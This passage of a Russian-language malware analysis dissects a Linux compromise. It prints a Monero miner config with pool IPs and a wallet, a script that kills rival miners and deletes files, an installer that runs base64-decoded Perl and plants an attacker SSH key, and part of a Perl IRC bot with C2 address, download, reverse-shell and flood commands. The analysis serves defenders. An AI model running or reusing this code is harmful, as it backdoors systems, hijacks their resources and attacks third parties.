\u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c json \u0442\u0430\u043a\u043e\u0433\u043e \u0432\u0438\u0434\u0430:<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041f\u0440\u0438\u043c\u0435\u0440 \u043a\u043e\u043d\u0444\u0438\u0433\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"json\">{     &quot;autosave&quot;: true,     &quot;cpu&quot;: true,     &quot;opencl&quot;: false,     &quot;cuda&quot;: false,     &quot;pools&quot;: [         {             &quot;url&quot;: &quot;sdfsdf:3333&quot;         }     ] }<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u043d\u044b\u043c \u043a\u043b\u044e\u0447\u043e\u043c \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0432\u044b\u0431\u0435\u0440\u0435\u043c <code>&quot;pools&quot;<\/code>. \u041f\u0440\u043e\u0432\u0435\u0440\u0438\u043c. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">strings -n5 anacron | less  <\/code><\/pre>\n<p>  <\/p>\n<p>\u0438 \u043f\u043e\u0438\u0449\u0435\u043c \u0441\u0442\u0440\u043e\u043a\u0443 &quot;pools&quot;.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0423 \u043d\u0430\u0441 100% \u043f\u043e\u043f\u0430\u0434\u0430\u043d\u0438\u0435 \u043d\u0430 \u0438\u0441\u043a\u043e\u043c\u044b\u0439 \u043a\u043e\u043d\u0444\u0438\u0433<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"json\">{     &quot;api&quot;: {         &quot;id&quot;: null,         &quot;worker-id&quot;: null     },     &quot;http&quot;: {         &quot;enabled&quot;: false,         &quot;host&quot;: &quot;127.0.0.1&quot;,         &quot;port&quot;: 0,         &quot;access-token&quot;: null,         &quot;restricted&quot;: true     },     &quot;autosave&quot;: true,     &quot;version&quot;: 1,     &quot;background&quot;: true,     &quot;colors&quot;: true,     &quot;randomx&quot;: {         &quot;init&quot;: -1,         &quot;numa&quot;: true     },     &quot;cpu&quot;: {         &quot;enabled&quot;: true,         &quot;huge-pages&quot;: true,         &quot;hw-aes&quot;: null,         &quot;priority&quot;: null,         &quot;memory-pool&quot;: false,         &quot;max-threads-hint&quot;: 100,         &quot;asm&quot;: true,         &quot;argon2-impl&quot;: null,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;opencl&quot;: {         &quot;enabled&quot;: false,         &quot;cache&quot;: true,         &quot;loader&quot;: null,         &quot;platform&quot;: &quot;AMD&quot;,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;cuda&quot;: {         &quot;enabled&quot;: false,         &quot;loader&quot;: null,         &quot;nvml&quot;: true,         &quot;cn\/0&quot;: false,         &quot;cn-lite\/0&quot;: false     },     &quot;donate-level&quot;: 0,     &quot;donate-over-proxy&quot;: 0,     &quot;log-file&quot;: null,     &quot;pools&quot;: [         {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;debian-package.center:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         },         {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;45.9.148.125:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         },         {             &quot;coin&quot;: &quot;monero&quot;,             &quot;algo&quot;: null,             &quot;url&quot;: &quot;45.9.148.129:80&quot;,             &quot;user&quot;: &quot;45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ&quot;,             &quot;pass&quot;: &quot;x&quot;,             &quot;tls&quot;: false,             &quot;keepalive&quot;: true,             &quot;nicehash&quot;: true         }     ],     &quot;print-time&quot;: 60,     &quot;health-print-time&quot;: 60,     &quot;retries&quot;: 5,     &quot;retry-pause&quot;: 5,     &quot;syslog&quot;: false,     &quot;user-agent&quot;: null,     &quot;watch&quot;: true }<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041c\u0430\u043b\u0432\u0430\u0440\u044c \u043c\u0430\u0439\u043d\u0438\u0442 \u043c\u043e\u043d\u0435\u0440\u043e \u043d\u0430 \u043f\u0443\u043b\u0430\u0445 <code>debian-package.center<\/code>, <code>45.9.148.125<\/code>, <code>45.9.148.129<\/code> \u0434\u043b\u044f \u044e\u0437\u0435\u0440\u0430 <code>45BLAvLNayefqNad3tGpHKPzviQUYHF1mCapMhgRuiiAJPYX4KyRCVg9veTmckPN7bDebx51LCuDQYyhFgVbUMhc4qY14CQ<\/code> \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c <code>x<\/code> \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0435 \u0438\u043c\u044f <code>debian-package.center<\/code> \u0440\u0435\u0437\u043e\u043b\u0432\u0438\u0442\u0441\u044f \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u043f\u043e \u0441\u043f\u0438\u0441\u043a\u0443 ip <code>45.9.148.129<\/code><\/p>\n<p>  <\/p>\n<p>\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u043c\u0430\u0439\u043d\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u043a\u0440\u0438\u043f\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 <code>a\/init0<\/code>. \u041f\u0435\u0440\u0435\u0434 \u0442\u0435\u043c \u043a\u0430\u043a \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0432\u043e\u044e \u043a\u043e\u043f\u0438\u044e, \u043e\u043d \u0438\u0437\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0442 \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043e\u0432 \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0437\u0430\u043d\u0438\u043c\u0430\u044e\u0442 \u0431\u043e\u043b\u0435\u0435 60% \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438. \u041f\u043e\u0438\u0441\u043a \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0441\u043a\u0440\u0438\u043f\u0442 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442 \u043f\u043e \u0438\u043c\u0435\u043d\u0438, \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c\u0443 \u043c\u0435\u0441\u0442\u043e\u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044e \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0430\u043b\u0432\u0430\u0440\u0435\u0439. \u0412 \u0446\u0435\u043b\u043e\u043c, \u044d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u0430\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 &quot;\u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430&quot;<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043f\u0442 a\/init-0<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh  ##########################################################################################\\ ### A script for killing cryptocurrecncy miners in a Linux enviornment ### Provided with zero liability (!) ### ### Some of the malware used as sources for this tool: ### https:\/\/pastebin.com\/pxc1sXYZ ### https:\/\/pastebin.com\/jRerGP1u ### SHA256: 2e3e8f980fde5757248e1c72ab8857eb2aea9ef4a37517261a1b013e3dc9e3c4 ##########################################################################################\\  # Killing processes by name, path, arguments and CPU utilization processes(){     killme() {       killall -9 chron-34e2fg;ps wx|awk '\/34e|r\\\/v3|moy5|defunct\/' | awk '{print $1}' | xargs kill -9 &amp; &gt; \/dev\/null &amp;     }      killa() {     what=$1;ps auxw|awk &quot;\/$what\/&quot; |awk '!\/awk\/' | awk '{print $2}'|xargs kill -9&amp;&gt;\/dev\/null&amp;     }      killa 34e2fg     killme      # Killing big CPU     VAR=$(ps uwx|awk '{print $2&quot;:&quot;$3}'| grep -v CPU)     for word in $VAR     do       CPUUSAGE=$(echo $word|awk -F&quot;:&quot; '{print $2}'|awk -F&quot;.&quot; '{ print $1}')       if [ $CPUUSAGE -gt 60 ]; then echo BIG $word; PID=$(echo $word | awk -F&quot;:&quot; '{print $1'});LINE=$(ps uwx | grep $PID);COUNT=$(echo $LINE| grep -P &quot;er\/v5|34e2|Xtmp|wf32N4|moy5Me|ssh&quot;|wc -l);if [ $COUNT -eq 0 ]; then echo KILLING $line; fi;kill $PID;fi;     done      killall \\.Historys     killall \\.sshd     killall neptune     killall xm64     killall xm32     killall xmrig     killall \\.xmrig     killall suppoieup      pkill -f sourplum     pkill wnTKYg &amp;&amp; pkill ddg* &amp;&amp; rm -rf \/tmp\/ddg* &amp;&amp; rm -rf \/tmp\/wnTKYg      ps auxf|grep -v grep|grep &quot;mine.moneropool.com&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:8080&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:3333&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;monerohash.com&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/tmp\/a7b104c270&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:6666&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:7777&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmr.crypto-pool.fr:443&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;stratum.f2pool.com:8888&quot;|awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrpool.eu&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrig&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrigDaemon&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;xmrigMiner&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/var\/tmp\/java&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;ddgs&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;qW3xT&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;t00ls.ru&quot; | awk '{print $2}'|xargs kill -9     ps auxf|grep -v grep|grep &quot;\/var\/tmp\/sustes&quot; | awk '{print $2}'|xargs kill -9      ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9     ps auxf|grep named| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelcfg| awk '{print $2}'|xargs kill -9     ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelupgrade| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelorg| awk '{print $2}'|xargs kill -9     ps auxf|grep kernelupdates| awk '{print $2}'|xargs kill -9      ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep &quot;\\-c&quot;|xargs kill -9     ps ax|grep -o '.\/[0-9]* -c'| xargs pkill -f      pkill -f \/usr\/bin\/.sshd     pkill -f acpid     pkill -f AnXqV.yam     pkill -f apaceha     pkill -f askdljlqw     pkill -f bashe     pkill -f bashf     pkill -f bashg     pkill -f bashh     pkill -f bashx     pkill -f BI5zj     pkill -f biosetjenkins     pkill -f bonn.sh     pkill -f bonns     pkill -f conn.sh     pkill -f conns     pkill -f cryptonight     pkill -f crypto-pool     pkill -f ddg.2011     pkill -f deamon     pkill -f disk_genius     pkill -f donns     pkill -f Duck.sh     pkill -f gddr     pkill -f Guard.sh     pkill -f i586     pkill -f icb5o     pkill -f ir29xc1     pkill -f irqba2anc1     pkill -f irqba5xnc1     pkill -f irqbalanc1     pkill -f irqbalance     pkill -f irqbnc1     pkill -f JnKihGjn     pkill -f jweri     pkill -f kw.sh     pkill -f kworker34     pkill -f kxjd     pkill -f libapache     pkill -f Loopback     pkill -f lx26     pkill -f mgwsl     pkill -f minerd     pkill -f minergate     pkill -f minexmr     pkill -f mixnerdx     pkill -f mstxmr     pkill -f nanoWatch     pkill -f nopxi     pkill -f NXLAi     pkill -f performedl     pkill -f polkitd     pkill -f pro.sh     pkill -f pythno     pkill -f qW3xT.2     pkill -f sourplum     pkill -f stratum     pkill -f sustes     pkill -f wnTKYg     pkill -f XbashY     pkill -f XJnRj     pkill -f xmrig     pkill -f xmrigDaemon     pkill -f xmrigMiner     pkill -f ysaydh     pkill -f zigw      # crond     ps ax | grep crond | grep -v grep | awk '{print $1}' &gt; \/tmp\/crondpid     while read crondpid     do         if [ $(echo  $(ps -p $crondpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill $crondpid             rm -rf \/var\/tmp\/v3         fi     done &lt; \/tmp\/crondpid     rm \/tmp\/crondpid -f      # sshd     ps ax | grep sshd | grep -v grep | awk '{print $1}' &gt; \/tmp\/ssdpid     while read sshdpid     do         if [ $(echo  $(ps -p $sshdpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill $sshdpid         fi     done &lt; \/tmp\/ssdpid     rm -f \/tmp\/ssdpid      # syslog     ps ax | grep syslogs | grep -v grep | awk '{print $1}' &gt; \/tmp\/syslogspid     while read syslogpid     do         if [ $(echo  $(ps -p $syslogpid -o %cpu | grep -v \\%CPU) | sed -e 's\/\\.[0-9]*\/\/g')  -ge 60 ]         then             kill  $syslogpid         fi     done &lt; \/tmp\/syslogspid     rm \/tmp\/syslogspid -f          ps x | grep 'b 22'| awk '{print $1,$5}' &gt; .procs          cat .procs | while read line         do          pid=`echo $line | awk '{print $1;}'`         name=`echo $line | awk '{print $2;}'`         #echo $pid $name           if [ $(echo $name | wc -c) -lt &quot;13&quot; ]             then             echo &quot;Found&quot; $pid $name             kill -9 $pid         fi         done          ####################################################          ps x | grep 'd 22'| awk '{print $1,$5}' &gt; .procs          cat .procs | while read line         do          pid=`echo $line | awk '{print $1;}'`         name=`echo $line | awk '{print $2;}'`         #echo $pid $name           if [ $(echo $name | wc -c) -lt &quot;13&quot; ]             then             echo &quot;Found&quot; $pid $name             kill -9 $pid         fi         done  }  # Removing miners by known path IOC files(){     rm \/tmp\/.cron     rm \/tmp\/.main     rm \/tmp\/.yam* -rf     rm -f \/tmp\/irq     rm -f \/tmp\/irq.sh     rm -f \/tmp\/irqbalanc1     rm -rf \/boot\/grub\/deamon &amp;&amp; rm -rf \/boot\/grub\/disk_genius     rm -rf \/tmp\/*httpd.conf     rm -rf \/tmp\/*httpd.conf*     rm -rf \/tmp\/*index_bak*     rm -rf \/tmp\/.systemd-private-*     rm -rf \/tmp\/.xm*     rm -rf \/tmp\/a7b104c270     rm -rf \/tmp\/conn     rm -rf \/tmp\/conns     rm -rf \/tmp\/httpd.conf     rm -rf \/tmp\/java*     rm -rf \/tmp\/kworkerds \/bin\/kworkerds \/bin\/config.json \/var\/tmp\/kworkerds \/var\/tmp\/config.json \/usr\/local\/lib\/libjdk.so     rm -rf \/tmp\/qW3xT.2 \/tmp\/ddgs.3013 \/tmp\/ddgs.3012 \/tmp\/wnTKYg \/tmp\/2t3ik     rm -rf \/tmp\/root.sh \/tmp\/pools.txt \/tmp\/libapache \/tmp\/config.json \/tmp\/bashf \/tmp\/bashg \/tmp\/libapache     rm -rf \/tmp\/xm*     rm -rf \/var\/tmp\/java* }  # Killing and blocking miners by network related IOC network(){     # Kill by known ports\/IPs     netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep 140.82.52.87 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :23 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :443 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :143 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :2222 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3389 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :6665 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :6667 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :8444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9     netstat -anp | grep :13531 |awk '{print $7}'| awk -F'[\/]' '{print $1}' | xargs kill -9 }     files processes network echo &quot;DONE&quot;<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<h3 id=\"shellbot\">\u0428\u0435\u043b\u043b\u0431\u043e\u0442<\/h3>\n<p>  <\/p>\n<p>\u0416\u0438\u0432\u0435\u0442 \u0432 <code>.rsync\/b\/run<\/code> \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0438\u0437 \u0441\u0435\u0431\u044f \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0432 base64 \u0438 \u0441\u0436\u0430\u0442\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440-\u0441\u043a\u0440\u0438\u043f\u0442 \u043d\u0430 perl, \u043f\u043e\u0445\u043e\u0436\u0438\u0439 \u043d\u0430 <a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/perl-based-shellbot-looks-to-target-organizations-via-cc\/\">\u044d\u0442\u043e\u0442 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440<\/a>. \u041e\u043d \u0442\u0430\u043a \u0436\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 ssh \u043a\u043b\u044e\u0447 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0434\u043b\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u043e \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0421\u043a\u0440\u0438\u043f\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0430 \u0448\u0435\u043b\u043b\u0431\u043e\u0442\u0430<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh nohup .\/stop&gt;&gt;\/dev\/null &amp; sleep 5 echo &quot;&lt;base64&gt;&quot; | base64 --decode | perl cd ~ &amp;&amp; rm -rf .ssh &amp;&amp; mkdir .ssh &amp;&amp; echo &quot;ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2\/9p7+vD0EpZ3Tz\/+0kX34uAx1RV\/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr&quot;&gt;&gt;.ssh\/authorized_keys &amp;&amp; chmod -R go= ~\/.ssh<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0427\u0430\u0441\u0442\u044c \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 perl<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"perl\">my $processo = 'rsync';  $servidor='45.9.148.125' unless $servidor; my $porta='443';  my $VERSAO = '0.2a';  sub parse {    my $servarg = shift;    if ($servarg =~ \/^PING \\:(.*)\/) {      sendraw(&quot;PONG :$1&quot;);    } elsif ($servarg =~ \/^\\:(.+?)\\!(.+?)\\@(.+?) PRIVMSG (.+?) \\:(.+)\/) {        my $pn=$1; my $onde = $4; my $args = $5;        if ($args =~ \/^\\001VERSION\\001$\/) {          notice(&quot;$pn&quot;, &quot;\\001VERSION mIRC v6.16 ENE ALIN GABRIEL\\001&quot;);        }        elsif ($args =~ \/^\\001PING\\s+(\\d+)\\001$\/) {          notice(&quot;$pn&quot;, &quot;\\001PONG\\001&quot;);        }        elsif (grep {$_ =~ \/^\\Q$pn\\E$\/i } @adms) {          if ($onde eq &quot;$meunick&quot;){            shell(&quot;$pn&quot;, &quot;$args&quot;);            }          elsif ($args =~ \/^(\\Q$meunick\\E|\\Q$prefixo\\E)\\s+(.*)\/ ) {             my $natrix = $1;             my $arg = $2;             if ($arg =~ \/^\\!(.*)\/) {               ircase(&quot;$pn&quot;,&quot;$onde&quot;,&quot;$1&quot;) unless ($natrix eq &quot;$prefixo&quot; and $arg =~ \/^\\!nick\/);             } elsif ($arg =~ \/^\\@(.*)\/) {                 $ondep = $onde;                 $ondep = $pn if $onde eq $meunick;                 bfunc(&quot;$ondep&quot;,&quot;$1&quot;);             } else {                 shell(&quot;$onde&quot;, &quot;$arg&quot;);             }          }        }    } elsif ($servarg =~ \/^\\:(.+?)\\!(.+?)\\@(.+?)\\s+NICK\\s+\\:(\\S+)\/i) {        if (lc($1) eq lc($meunick)) {          $meunick=$4;          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;        }    } elsif ($servarg =~ m\/^\\:(.+?)\\s+433\/i) {        $meunick = getnick();        nick(&quot;$meunick&quot;);    } elsif ($servarg =~ m\/^\\:(.+?)\\s+001\\s+(\\S+)\\s\/i) {        $meunick = $2;        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;        $irc_servers{$IRC_cur_socket}{'nome'} = &quot;$1&quot;;        foreach my $canal (@canais) {          sendraw(&quot;JOIN $canal&quot;);        }    } }  sub bfunc {   my $printl = $_[0];   my $funcarg = $_[1];   if (my $pid = fork) {      waitpid($pid, 0);   } else {       if (fork) {          exit;        } else {            if ($funcarg =~ \/^portscan (.*)\/) {              my $hostip=&quot;$1&quot;;              my @portas=(&quot;21&quot;,&quot;22&quot;,&quot;23&quot;,&quot;25&quot;,&quot;53&quot;,&quot;80&quot;,&quot;110&quot;,&quot;143&quot;,&quot;6665&quot;);              my (@aberta, %porta_banner);              ....            }             elsif ($funcarg =~ \/^download\\s+(.*)\\s+(.*)\/) {             getstore(&quot;$1&quot;, &quot;$2&quot;);             sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :Download de $2 ($1) Conclu.do!&quot;) if ($estatisticas);             }             elsif ($funcarg =~ \/^fullportscan\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {              my $hostname=&quot;$1&quot;;              my $portainicial = &quot;$2&quot;;              my $portafinal = &quot;$3&quot;;              my (@abertas, %porta_banner);              ...             }              elsif ($funcarg =~ \/^udp\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {               return unless $pacotes;               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);               my $alvo=inet_aton(&quot;$1&quot;);               my $porta = &quot;$2&quot;;               my $tempo = &quot;$3&quot;;               my $pacote;               my $pacotese;               my $fim = time + $tempo;               my $pacota = 1;               ...             }              elsif ($funcarg =~ \/^udpfaixa\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {               return unless $pacotes;               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);               my $faixaip=&quot;$1&quot;;               my $porta = &quot;$2&quot;;               my $tempo = &quot;$3&quot;;               my $pacote;               my $pacotes;               my $fim = time + $tempo;               my $pacota = 1;               my $alvo;               ...               if ($estatisticas)               {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Tempo de Pacotes\\002: $tempo&quot;.&quot;s&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total de Pacotes\\002: $pacotese&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Alvo dos Pacotes\\002: $alvo&quot;);               }             }              elsif ($funcarg =~ \/^conback\\s+(.*)\\s+(\\d+)\/) {               my $host = &quot;$1&quot;;               my $porta = &quot;$2&quot;;               my $proto = getprotobyname('tcp');               my $iaddr = inet_aton($host);               my $paddr = sockaddr_in($porta, $iaddr);               my $shell = &quot;\/bin\/sh -i&quot;;               if ($^O eq &quot;MSWin32&quot;) {                 $shell = &quot;cmd.exe&quot;;               }               ...                if ($estatisticas)               {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Conectando-se em\\002: $host:$porta&quot;);               }             }             elsif ($funcarg =~ \/^oldpack\\s+(.*)\\s+(\\d+)\\s+(\\d+)\/) {             return unless $pacotes;              my ($dtime, %pacotes) = attacker(&quot;$1&quot;, &quot;$2&quot;, &quot;$3&quot;);              $dtime = 1 if $dtime == 0;              my %bytes;              $bytes{igmp} = $2 * $pacotes{igmp};              $bytes{icmp} = $2 * $pacotes{icmp};              $bytes{o} = $2 * $pacotes{o};              $bytes{udp} = $2 * $pacotes{udp};              $bytes{tcp} = $2 * $pacotes{tcp};              unless ($estatisticas)              {                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002 - Status -\\002&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Timp\\002: $dtime&quot;.&quot;secunde.&quot;);                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total packet\\002: &quot;.($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Total bytes\\002: &quot;.($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));                sendraw($IRC_cur_socket, &quot;PRIVMSG $printl :\\002Flood\\002: &quot;.int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})\/1024)\/$dtime).&quot; kbps&quot;);              }            }            exit;        }   } 